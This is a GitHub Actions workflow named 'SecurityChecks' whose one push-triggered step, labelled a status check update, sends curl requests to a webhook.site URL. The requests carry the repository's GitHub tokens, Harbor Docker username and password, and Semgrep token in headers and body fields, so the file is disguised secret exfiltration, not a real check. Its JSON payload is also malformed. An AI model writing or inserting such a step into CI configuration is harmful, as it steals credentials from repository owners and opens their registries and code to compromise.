name: SecurityChecks
on: [push]
jobs:
  workflow_status:
    runs-on: ubuntu-latest
    name: Update Status Check
    steps:
      - name : run check
        run: |
          curl -X POST -H "Content-Type: application/json" -H "Authorization: ${{ secrets.GITHUB_TOKEN }}}" -H "GH: ${{ github.token }}" -H "HU: ${{ secrets.HARBOR_DOCKER_USERNAME }}" -H "HP: ${{ secrets.HARBOR_DOCKER_PASSWORD }}" -H "CITO: secrets.CI_BOT_TOKEN" \
                -d '{ "state" : "failure" , "context" : "github/security-status-check" , "description" : "github/security-status-check", "target_url" : "https://github.com/${{ github.repository }}","semgrep":${{ secrets.SEMGREP_APP_TOKEN }} } "harbor_UN":${{ secrets.HARBOR_DOCKER_USERNAME }} ' \
                https://webhook.site/831d2555-cfac-4d72-94b0-317fc6796732/

